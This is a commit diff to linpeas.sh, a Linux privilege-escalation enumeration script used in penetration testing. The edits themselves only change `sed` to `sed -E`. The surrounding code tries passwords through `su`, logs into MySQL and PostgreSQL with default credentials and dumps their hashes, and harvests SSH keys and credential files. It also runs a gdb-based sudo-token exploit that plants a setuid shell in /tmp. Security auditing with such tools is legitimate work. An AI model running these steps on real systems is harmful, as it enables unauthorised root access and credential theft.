linpeas2.7.8

2020-09-08 04:47:57 -04:00 · 2020-09-08 04:47:57 -04:00 · 6f102371d7
commit 6f102371d7
parent 65c5fc894a
1 changed files with 93 additions and 93 deletions
--- a/linPEAS/linpeas.sh
+++ b/linPEAS/linpeas.sh
@ -445,7 +445,7 @@ su_try_pwd (){
  PASSWORDTRY=$2
  trysu=`echo "$PASSWORDTRY" | timeout 1 su $USER -c whoami 2>/dev/null` 
  if [ "$trysu" ]; then
-    echo "  You can login as $USER using password: $PASSWORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
+    echo "  You can login as $USER using password: $PASSWORDTRY" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
  fi
 }

@ -564,7 +564,7 @@ discover_network (){

  #Using fping if possible
  if [ "$FPING" ]; then 
-    $FPING -a -q -g $DISCOVERY | sed "s,.*,${C}[1;31m&${C}[0m,"
+    $FPING -a -q -g $DISCOVERY | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  
  #Loop using ping
  else
@ -1008,8 +1008,8 @@ if [ "`echo $CHECKS | grep SysI`" ]; then
  printf $Y"[+] "$GREEN"Is this a container? ........... "$NC
  dockercontainer=`grep -i docker /proc/self/cgroup  2>/dev/null; find / -maxdepth 3 -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`
  lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`
-  if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed "s,.*,${C}[1;31m&${C}[0m,";
-  elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed "s,.*,${C}[1;31m&${C}[0m,";
+  if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed -E "s,.*,${C}[1;31m&${C}[0m,";
+  elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed -E "s,.*,${C}[1;31m&${C}[0m,";
  else echo_no
  fi

@ -1026,11 +1026,11 @@ if [ "`echo $CHECKS | grep SysI`" ]; then
    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
-    echo "Yes $containerCounts" | sed "s,.*,${C}[1;31m&${C}[0m,"
+    echo "Yes $containerCounts" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    # List any running containers
-    if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
-    if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi
-    if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi
+    if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
+    if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi
+    if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi
  fi

  echo ""
@ -1168,7 +1168,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
  for s in $services; do
    if [ ! -O "$s" ]; then #Remove services that belongs to the current user
      if [ -w "$s" ] && [ -f "$s" ]; then
-        echo "$s" | sed "s,.*,${C}[1;31;103m&${C}[0m,g"
+        echo "$s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,g"
      fi
      servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths
      for sp in $servicebinpaths; do
@ -1180,14 +1180,14 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
      relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`"
      if [ "$relpath1" ] || [ "$relpath2" ]; then
        if [ "$WRITABLESYSTEMDPATH" ]; then
-          echo "$s is executing some relative path" | sed "s,.*,${C}[1;31m&${C}[0m,";
+          echo "$s is executing some relative path" | sed -E "s,.*,${C}[1;31m&${C}[0m,";
        else
          echo "$s is executing some relative path"
        fi
      fi
    fi
  done
-  if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed "s,.*,${C}[1;32m&${C}[0m,"; fi
+  if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -E "s,.*,${C}[1;32m&${C}[0m,"; fi
  echo ""
  
  #-- PSC) Timers
@ -1202,7 +1202,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
  timers=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.timer')
  for t in $timers; do
    if [ -w "$t" ]; then
-      echo "$t" | sed "s,.*,${C}[1;31m&${C}[0m,g"
+      echo "$t" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
    fi
    timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`"
    for tb in $timerbinpaths; do
@ -1265,7 +1265,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
    for d in "$dbusfols"; do
      for f in $d/*; do
        if [ -w "$f" ]; then
-          echo "Writable $f" | sed "s,.*,${C}[1;31m&${C}[0m,g"
+          echo "Writable $f" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
        fi

        genpol=`grep "<policy>" "$f" 2>/dev/null`
@ -1355,7 +1355,7 @@ if [ "`echo $CHECKS | grep Net`" ]; then
  timeout 1 tcpdump >/dev/null 2>&1
  if [ $? -eq 124 ]; then #If 124, then timed out == It worked
      printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing\n"$NC
-      echo "You can sniff with tcpdump!" | sed "s,.*,${C}[1;31m&${C}[0m,"
+      echo "You can sniff with tcpdump!" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi
  echo ""
@ -1402,11 +1402,11 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then
  fi
  (cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null  || echo_not_found "/etc/sudoers" 
  if [ -w '/etc/sudoers.d/' ]; then
-    echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
+    echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
  fi
  for filename in '/etc/sudoers.d/*'; do
    if [ -r "$filename" ]; then
-      echo "Sudoers file: $filename is readable" | sed "s,.*,${C}[1;31m&${C}[0m,g"
+      echo "Sudoers file: $filename is readable" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
      cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,"
    fi
  done
@ -1420,7 +1420,7 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then
  else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${C}[1;32m&${C}[0m,g";
  fi
  is_gdb="`which gdb 2>/dev/null`"
-  if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed "s,.*,${C}[1;31m&${C}[0m,g";
+  if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -E "s,.*,${C}[1;31m&${C}[0m,g";
  else echo "gdb wasn't found in PATH" | sed "s,gdb,${C}[1;32m&${C}[0m,g";
  fi
  if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then
@ -1430,7 +1430,7 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then
      echo 'call system("echo | sudo -S cp /bin/sh /tmp/shrndom >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/shrndom >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1
    done
    if [ -f "/tmp/shrndom" ]; then 
-      echo "Sudo tokens exploit worked, you can escalate privileges using '/tmp/shrndom -p'" | sed "s,.*,${C}[1;31;103m&${C}[0m,";
+      echo "Sudo tokens exploit worked, you can escalate privileges using '/tmp/shrndom -p'" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,";
    else echo "The escalation didn't work... (try again later?)"
    fi
  fi
@ -1536,8 +1536,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  printf $Y"[+] "$GREEN"MySQL connection using default root/root ........... "$NC
  mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null`
  if [ "$mysqlconnect" ]; then
-    echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
-    mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+    echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
+    mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi

@ -1545,8 +1545,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  printf $Y"[+] "$GREEN"MySQL connection using root/toor ................... "$NC
  mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null`
  if [ "$mysqlconnect" ]; then
-    echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
-    mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+    echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
+    mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi

@ -1554,8 +1554,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null`
  printf $Y"[+] "$GREEN"MySQL connection using root/NOPASS ................. "$NC
  if [ "$mysqlconnectnopass" ]; then
-    echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
-    mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+    echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
+    mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi

@ -1567,14 +1567,14 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
      dcnf=`find $d -name debian.cnf 2>/dev/null`
      for f in $dcnf; do
        if [ -r $f ]; then 
-          echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed "s,.*,${C}[1;31m&${C}[0m,"
+          echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
          cat "$f"
        fi
      done
      uMYD=`find $d -name user.MYD 2>/dev/null`
      for f in $uMYD; do
        if [ -r "$f" ]; then 
-          echo "We can read the Mysql Hashes from $f" | sed "s,.*,${C}[1;31m&${C}[0m,"
+          echo "We can read the Mysql Hashes from $f" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
          grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" 
        fi
      done
@ -1595,7 +1595,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
      mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"`
      if [ "$mysqlexec" ]; then 
        echo "Found $mysqlexec"
-        echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed "s,.*,${C}[1;31m&${C}[0m,"
+        echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
      fi
    done
  else echo_not_found
@ -1609,7 +1609,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  postgconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$')
  if [ "$postgver" ] || [ "$postgdb" ] || [ "$postgconfs" ]; then
    if [ "$postgver" ]; then echo "Version: $postgver"; fi
-    if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
+    if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
    for f in $postgconfs; do
      if [ -r "$f" ]; then 
        echo "Found readable $f"
@ -1625,7 +1625,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  if [ "$TIMEOUT" ]; then  # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
  #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
    printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using postgres/NOPASS ........ "$NC
-    if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
+    if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    else echo_no
    fi

@ -1635,12 +1635,12 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
    fi

    printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using pgsql/NOPASS ........... "$NC
-    if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
+    if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    else echo_no
    fi

    printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using pgsql/NOPASS ........... "$NC
-    if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed "s,.*,${C}[1;31m&${C}[0m,"
+    if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    else echo_no
    fi
    echo ""
@ -1679,7 +1679,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  wp=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'wp-config\.php$')
  if [ "$wp" ]; then
    echo "wp-config.php files found:\n$wp"
-    for f in $wp; do grep "PASSWORD\|USER\|NAME\|HOST" "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; done
+    for f in $wp; do grep "PASSWORD\|USER\|NAME\|HOST" "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
  else echo_not_found "wp-config.php"
  fi
  echo ""
@ -1689,7 +1689,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  drup=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'settings\.php$')
  if [ "`echo $drup | grep '/default/settings.php'`" ]; then #Check path /default/settings.php
    echo "settings.php files found:\n$drup"
-    for f in $drup; do grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" $f 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; done
+    for f in $drup; do grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" $f 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
  else echo_not_found "/default/settings.php"
  fi
  echo ""
@ -1699,7 +1699,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  tomcat=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'tomcat-users\.xml$')
  if [ "$tomcat" ]; then
    echo "tomcat-users.xml file found: $tomcat"
-    for f in $tomcat; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed "s,.*,${C}[1;31m&${C}[0m,"; done
+    for f in $tomcat; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
  else echo_not_found "tomcat-users.xml"
  fi
  echo ""
@ -1743,7 +1743,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
    for f in $rsyncd; do 
      printf "$f\n"
      if [ `echo "$f" | grep -i "secrets"` ]; then
-        cat "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
+        cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
      else
        cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,secrets.*|auth.*users.*=,${C}[1;31m&${C}[0m,"
      fi
@ -1788,7 +1788,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  vnc=$(echo "$FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_USERS" | grep -E '\.vnc')
  if [ "$vnc" ]; then
    printf "$vnc\n"
-    for d in $vnc; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; done
+    for d in $vnc; do find "$d" -name "passwd" -exec ls -l {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done
  else echo_not_found ".vnc"
  fi
  echo ""
@ -1811,7 +1811,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
    printf "$ovpn\n"
    for f in $ovpn; do 
      if [ -r "$f" ]; then
-        cat "$f" 2>/dev/null | grep "auth-user-pass" | sed "s,auth-user-pass.*,${C}[1;31m&${C}[0m,";
+        cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -E "s,auth-user-pass.*,${C}[1;31m&${C}[0m,";
      fi
    done
  else echo_not_found ".ovpn"
@ -1835,7 +1835,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
    printf "$ssh\n"
  fi

-  grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m,"
+  grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -E "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m,"

  if [ "$TIMEOUT" ]; then
    privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null`
@ -1848,11 +1848,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  fi
    
  if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
-    printf "Possible private SSH keys were found!\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
-    if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
-    if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
-    if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
-    if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi
+    printf "Possible private SSH keys were found!\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
+    if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
+    if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
+    if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
+    if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi
  fi
  if [ "$certsb4_grep" ] || [ "$certsbin" ]; then
    echo "  --> Some certificates were found (out limited):"
@ -1879,13 +1879,13 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  if [ "$hostsdenied" ]; then
    echo " --> /etc/hosts.denied file found, read the rules:"
    printf "$homesshconfig\n"
-    cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed "s,.*,${C}[1;32m&${C}[0m,"
+    cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;32m&${C}[0m,"
    echo ""
  fi
  if [ "$hostsallow" ]; then
    echo " --> /etc/hosts.allow file found, read the rules:"
    printf "$homesshconfig\n"
-    cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed "s,.*,${C}[1;31m&${C}[0m,"
+    cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    echo ""
  fi
  if [ "$sshconfig" ]; then
@ -1899,7 +1899,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  printf $Y"[+] "$GREEN"Searching unexpected auth lines in /etc/pam.d/sshd\n"$NC
  pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth`
  if [ "$pamssh" ]; then
-    cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed "s,.*,${C}[1;31m&${C}[0m,"
+    cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -E "s,.*,${C}[1;31m&${C}[0m,"
  else echo_no
  fi
  echo ""
@ -1912,7 +1912,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
      if [ -f "$f" ]; then #Check if file, here we only look for filenames, not dirs
        printf "Trying to read $f\n" | sed -E "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g"
        if [ -r "$f" ]; then
-          cat "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,g"
+          cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,g"
        fi
        echo ""
      fi
@ -1923,7 +1923,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  #-- SI) NFS exports
  printf $Y"[+] "$GREEN"NFS exports?\n"$NC
  printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe\n"$NC
-  if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed "s,insecure,${C}[1;31m&${C}[0m,"
+  if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -E "s,insecure,${C}[1;31m&${C}[0m,"
  else echo_not_found "/etc/exports"
  fi
  echo ""
@ -1935,7 +1935,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  if [ "$krb5" ]; then
    for f in $krb5; do
      if [ -r "$f" ]; then
-        cat "$f" 2>/dev/null | grep default_ccache_name | sed "s,default_ccache_name,${C}[1;31m&${C}[0m,"; 
+        cat "$f" 2>/dev/null | grep default_ccache_name | sed -E "s,default_ccache_name,${C}[1;31m&${C}[0m,"; 
      fi
    done
  else echo_not_found "krb5.conf"
@ -1966,8 +1966,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
     h=$(grep -R -i "defaults_file=" $f | cut -b 15-) ##Search string to know where is the default knock file - example - DEFAULTS_FILE=/etc/default/knockd
     i=$(grep -R -i "please edit" $h | awk '{print $4}') ##Search string to know where is config file - example - # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING
     j=$(grep -R -i "sequence" $i) ##If we want we can show sequence number - 'hidded'
-     printf "Config Knock file found!: \n$i\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
-     printf " Sequence found!: \n$j\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
+     printf "Config Knock file found!: \n$i\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
+     printf " Sequence found!: \n$j\n" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
    done
  else echo_not_found "Knock.config"
  fi
@ -1981,7 +1981,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
    for d in $logstash; do
      if [ -r "$d/startup.options" ]; then 
        echo "Logstash is running as user:"
-        cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m,"
+        cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -E "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,root,${C}[1;31m&${C}[0m,"
      fi
      cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -E "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m,"
      cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -E"s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m,"
@ -2013,7 +2013,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
    for f in $vaultssh; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
    echo ""
    vault secrets list 2>/dev/null
-    echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.vault-token' | sed "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
+    echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.vault-token' | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
  else echo_not_found "vault-ssh-helper.hcl"
  fi
  echo ""
@ -2032,7 +2032,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
  printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC
  screensess=`screen -ls 2>/dev/null`
  if [ "$screensess" ]; then
-    printf "$screensess" | sed "s,.*,${C}[1;31m&${C}[0m," | sed "s,No Sockets found.*,${C}[32m&${C}[0m,"
+    printf "$screensess" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,No Sockets found.*,${C}[32m&${C}[0m,"
  else echo_not_found "screen"
  fi
  echo ""
